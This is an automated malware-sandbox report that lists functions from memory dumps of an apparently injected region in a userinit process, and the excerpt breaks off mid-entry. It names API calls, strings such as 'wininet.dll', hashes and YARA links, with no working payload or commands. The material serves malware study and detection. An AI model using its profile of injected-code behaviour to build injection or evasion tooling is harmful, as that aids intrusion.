                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InitializeUninitialize
                                                      • String ID: @J7<
                                                      • API String ID: 3442037557-2016760708
                                                      • Opcode ID: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                      • Instruction ID: 6cd5b3ad624f785ee070ea5f3e37dd96772fd3653c995b56bbdd1aab8f576baa
                                                      • Opcode Fuzzy Hash: 6a81704b8de6bab05823ed953bb4463d50ac1888c863c694621acfd6ca484a67
                                                      • Instruction Fuzzy Hash: EE311EB5A0060A9FDB00DFD8CC809EEB7B9BF88304B148559E915AB215D775AE458BA0
                                                      Function 00AC3790 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 108sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00AC386B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: wininet.dll
                                                      • API String ID: 3472027048-3354682871
                                                      • Opcode ID: d3ee649aa51a6303ee889ca990ff9726971c79055851baaabdfcfc667915e533
                                                      • Instruction ID: c26f508df2ef021121529da1b64be8e047214b6009595f0dda911b94a4ae32bd
                                                      • Opcode Fuzzy Hash: d3ee649aa51a6303ee889ca990ff9726971c79055851baaabdfcfc667915e533
                                                      • Instruction Fuzzy Hash: 92316EB1A01705BBDB14DF64CC85FEBBBB8FB88700F04851DFA196B241D7706A408BA5
                                                      Function 00AB4250 Relevance: 1.7, APIs: 1, Instructions: 158libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4242
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction ID: f67202bae62eca024286779a40099c94312ca3a1778e8c896d2d79e2ada1b8ad
                                                      • Opcode Fuzzy Hash: 0e700db7e7ae3d175effefb3dd905522a701cb4ed781b9a175d105c238978748
                                                      • Instruction Fuzzy Hash: FD417931A052456BDB11DBB8DC42BEABBBCDF4A714F0406EEFD448B143E6329505CB80
                                                      Function 00AB41D0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00AB4242
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction ID: c5816f00193ee18207f0ad3a045dc2922d7bdccb46abb4618055995bc977426d
                                                      • Opcode Fuzzy Hash: dede90169ca1db16459994232f99263c7f2dcb4bb26b17399f27a86b55b0f282
                                                      • Instruction Fuzzy Hash: DA011EB5E4020DABDF10DBE4DD42FEDB3789B54308F004199E90897242F671EB55CB91
                                                      Function 00AC94B0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,?,8BF2C41C,?,00AB7FEE,00000010,?,?,?,00000044,?,00000010,00AB7FEE,?,8BF2C41C,?), ref: 00AC9513
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                      • Instruction ID: 15ede29850d12a6dc811d1c80d02e0dccdd68b3fe138c3f7b00e8118f2dc7477
                                                      • Opcode Fuzzy Hash: 56a61c51a895dbc6affd52a1c766e14ac807e4eff9a711212e461f79b1ccc8aa
                                                      • Instruction Fuzzy Hash: 94018CB6204608BFCB54DE99DC81EEB77ADAF8D754F418208BA19E7241D630F8518BA4
                                                      Function 00AA9AF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9B35
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                      • Instruction ID: 43f70cd84594d582ab29ed2d3df37e0f2b2fbb8739642383db57be7eb47f4cef
                                                      • Opcode Fuzzy Hash: b666ca78757feaef45e98809376a117604cb4ad09f8fed90e1b78c2a7cd5da3d
                                                      • Instruction Fuzzy Hash: 4DF06D7339060436E72076ADAC03FD7B78C8F81B61F250029FA0CEB1C1DA95F90182E4
                                                      Function 00AA9AEA Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00AA9B35
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                      • Instruction ID: 91723547e1b777cbc076967f96f1f68d4e40a3bb9443cab6bd31b8c224910d5e
                                                      • Opcode Fuzzy Hash: 8b0afc6a82cec3a2473c203f12133cbd19f44fefa4b433d70a40ff5cce6f215e
                                                      • Instruction Fuzzy Hash: A7F030723806003BE32066A9DC13FE7769D9F82B65F25001CF609AB1C1DA95B90186A4
                                                      Function 00AC93D0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00AB1689,?,00AC5CBB,00AB1689,00AC539F,00AC5CBB,?,00AB1689,00AC539F,00001000,?,?,00000000), ref: 00AC940C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction ID: ac2a4a8eb37d875b3c84f9038ee9d10a1dc5151523cf3e8528852fb44eba2679
                                                      • Opcode Fuzzy Hash: 6ae38073c7aa3304867fd0be910f8801875f33a6ff849def5cfbe6102455eb91
                                                      • Instruction Fuzzy Hash: F0E06DB6200208BBD610EF58DC85F9B77ACDFC9750F004108F909A7242D630B81087B5
                                                      Function 00AC9420 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D70B08E2,00000007,00000000,00000004,00000000,00AB3A48,000000F4), ref: 00AC945F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction ID: bb6f6992c6f229e8b0de5822f8174807038853792a7ffdbca4c5383317cb6756
                                                      • Opcode Fuzzy Hash: acdd237a7a728e10ed32de03d3610bc6aa7b5a30a2fd813fd7ddd9c11810606e
                                                      • Instruction Fuzzy Hash: 55E092B52042047FC610EE98DC45FAB37ACDFC9710F004009FA09A7241D774BC1487B8
                                                      Function 00AB8030 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AB805C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                      • Instruction ID: 97df95fe4db77b92d44b07e58af761c8e157c8afce04f35e623e242f9545a9d3
                                                      • Opcode Fuzzy Hash: 2440bff3137740337088c3ece4f8469803b100dfab4f7cf16c8f6bfde92db598
                                                      • Instruction Fuzzy Hash: 32E04F752503042AEB247AAC9C46FAA335C9B58B64F284664B91C9B2C2E9B9E9058260
                                                      Function 00AB802D Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00AB805C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                      • Instruction ID: e08f3eb69413daca474d2d219ae7667ea56ce7c135ae8dbb189ecc466614a148
                                                      • Opcode Fuzzy Hash: df5bfc7ebbd9ce0f358cd4c53087d5a895ddc15fac9fda3c5a16cb5a8b5a8fda
                                                      • Instruction Fuzzy Hash: FEE026712103002EFB20777C8D46BAE332C5B04760F280A64B928AF0C3DD7DE50A8320
                                                      Function 00AB7E20 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00AB1990,00AC7CDF,00AC539F,00AB1956), ref: 00AB7E53
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                      • Instruction ID: d68a449ec6b4096cc26dc98038b95e1107c8e2595af977cff656becec097e4df
                                                      • Opcode Fuzzy Hash: 9b94415c94796085445fa5cf7765cc542840a823db04e929f82b293c487896c3
                                                      • Instruction Fuzzy Hash: 8ED05EB53943083BF700B6A8CD17F6A368D5F49755F094468BA08E72C3EA55E50046A5
                                                      Function 03362C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b29d278e43de9ae1bc03daea084e4a976e08871a6beced063c2bf9b445f27ee2
                                                      • Instruction ID: ce3f5944d0e9b7fd7707e5e4e5a88c81d82f3c8c5d68f503f900b67e7a583bda
                                                      • Opcode Fuzzy Hash: b29d278e43de9ae1bc03daea084e4a976e08871a6beced063c2bf9b445f27ee2
                                                      • Instruction Fuzzy Hash: 83B09B719015C5CDDA51E7644A4D7177D4467D0701F1AC471D2034641E473DC1D1E175

                                                      Non-executed Functions

                                                      Function 032304DE Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                      • Instruction ID: 69325e1acd256828a78d341c05a217cdd703a955ef1c845c95e35268ca1819fc
                                                      • Opcode Fuzzy Hash: 05931bad407fad06c90276980eda770c1b279e7856ddd22cdd6d2d566640c38b
                                                      • Instruction Fuzzy Hash: 0C41F6B162CB4D4FD368EF6890816B6B3E5FF46310F54452DC8CBC3252EAB0E8868785
                                                      Function 0323DF66 Relevance: 57.7, Strings: 46, Instructions: 207COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                      • API String ID: 0-3754132690
                                                      • Opcode ID: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                      • Instruction ID: bcf0b4d20455266d27f3560daec85158b33f9f17fbdeac35d6a48aa8258c6dbd
                                                      • Opcode Fuzzy Hash: e5645683453c96cd5def99579692e90bd932f7ee67e734a6f0ef01789537d29f
                                                      • Instruction Fuzzy Hash: 409150F04182948AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89498F85
                                                      Function 03233C0F Relevance: 18.8, Strings: 15, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309134301.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_3230000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -/OB$3/67$7R[:$BNJN$HLUH$I@[5$JMUJ$KUJB$M[S0$NUK[$OJ[6$OUOU$THNU$TNHL$UHM
                                                      • API String ID: 0-3939393268
                                                      • Opcode ID: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                      • Instruction ID: ce986d296ccb3f96575100744fb6a40439c6ace07815cd79637407dd7da1e1d6
                                                      • Opcode Fuzzy Hash: 3df7bd082018e90712f34a75f073257b08e045aacf08472eff391d1352ce6ac2
                                                      • Instruction Fuzzy Hash: 103123B495424CEBCF25CF84D190ADEBFB2FF01304F828059E91A6F248C7768695CB98
                                                      Function 03362890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: fe62082b30a6e55c2567d2191dc7a18147737e7425d7f58e3b10aa94f3967702
                                                      • Instruction ID: a67fb6000b237e6da5aa590e612272ea27653f958def3e0774d16409ae23fc8b
                                                      • Opcode Fuzzy Hash: fe62082b30a6e55c2567d2191dc7a18147737e7425d7f58e3b10aa94f3967702
                                                      • Instruction Fuzzy Hash: F851B5B6A00216AFDB24DB988CD097FF7FCBB48201715C66AE4A5D7645D234DE508BA0
                                                      Function 033D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 2e1eb17a75fbec421e64d3143ae4c90c96fe04544b6d0a69e69d775629eee335
                                                      • Instruction ID: eef1548f6f193bd46fe5f52f2495d22e1c4fe562730a32f22bdd433e9905d783
                                                      • Opcode Fuzzy Hash: 2e1eb17a75fbec421e64d3143ae4c90c96fe04544b6d0a69e69d775629eee335
                                                      • Instruction Fuzzy Hash: 745105B6A00645AECB34DF9CDDD097FF7FDEB44200B148859E8A6D7641E7B4EA408760
                                                      Function 03357630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03394787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03394742
                                                      • Execute=1, xrefs: 03394713
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03394655
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03394725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033946FC
                                                      • ExecuteOptions, xrefs: 033946A0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 2c392789a9658f868357612be8c2ca3c3c29e9b3c718750f9656cf97a8a785f0
                                                      • Instruction ID: affd9bd4205b19715b01e28f83f5b99e89a27db942dbd7ff6fd30825237cd25d
                                                      • Opcode Fuzzy Hash: 2c392789a9658f868357612be8c2ca3c3c29e9b3c718750f9656cf97a8a785f0
                                                      • Instruction Fuzzy Hash: 3B51E839E01319AEEF10EAA9ECD5FBEB7ACEF04300F040099F915AB191E7719A458F51
                                                      Function 0336B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: 90cf1e74a3a0a2bc55b34027a1d99288e33423b98606d0492012437b352054fa
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 5681AC34E052499EDF24CE6AC8D17EEFBA6AF45350F1CC15AE861E7398C63498408F64
                                                      Function 033D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: ec98cd48d23a43dab7346314a901b6f5e905bb558682a5020633c6c0f649a734
                                                      • Instruction ID: 31e3fed4e7df569cc7267701ec784765855754a59240b513c0e3ee2c3fe53fbd
                                                      • Opcode Fuzzy Hash: ec98cd48d23a43dab7346314a901b6f5e905bb558682a5020633c6c0f649a734
                                                      • Instruction Fuzzy Hash: F62151BBE00219AFCB10DE69DC80AEFB7F8EF48650F084516E915E7200E730DA018BA1
                                                      Function 0334F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033902E7
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033902BD
                                                      • RTL: Re-Waiting, xrefs: 0339031E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: d89b090428c57685a8bdb1a8fa07ed8b6d94ecb411532beb38ab807d42738ef5
                                                      • Instruction ID: a92b29dfbab3abf545576f4b11bd92dea63be2f89fb19bef6bffc8410d709891
                                                      • Opcode Fuzzy Hash: d89b090428c57685a8bdb1a8fa07ed8b6d94ecb411532beb38ab807d42738ef5
                                                      • Instruction Fuzzy Hash: 8EE1AD34604741DFEB24CF28C9C4B2AB7E4FB88314F184A5AF5A58B6E1D778E844CB42
                                                      Function 0335BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03397B7F
                                                      • RTL: Re-Waiting, xrefs: 03397BAC
                                                      • RTL: Resource at %p, xrefs: 03397B8E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032F0000, based on PE: true
                                                      • Associated: 00000008.00000002.3309189641.0000000003419000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000341D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_32f0000_userinit.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: c8e9908723aabff53649f2b796ba2f7ed6af066056a186197676af90f1ab6744
                                                      • Instruction ID: eace290b8ce83fe190a84ea7c4900b6ce20751a8a164e200ec229d3db1f76c1d
                                                      • Opcode Fuzzy Hash: c8e9908723aabff53649f2b796ba2f7ed6af066056a186197676af90f1ab6744
                                                      • Instruction Fuzzy Hash: 9541BF357017029FDB24DE29DC80F6AF7E9EB88710F140A2EF95ADB680DB71E4058B91
                                                      Function 0335B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0339728C
                                                      Strings
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03397294
                                                      • RTL: Re-Waiting, xrefs: 033972C1
                                                      • RTL: Resource at %p, xrefs: 033972A3
                                                      Memory Dump Source
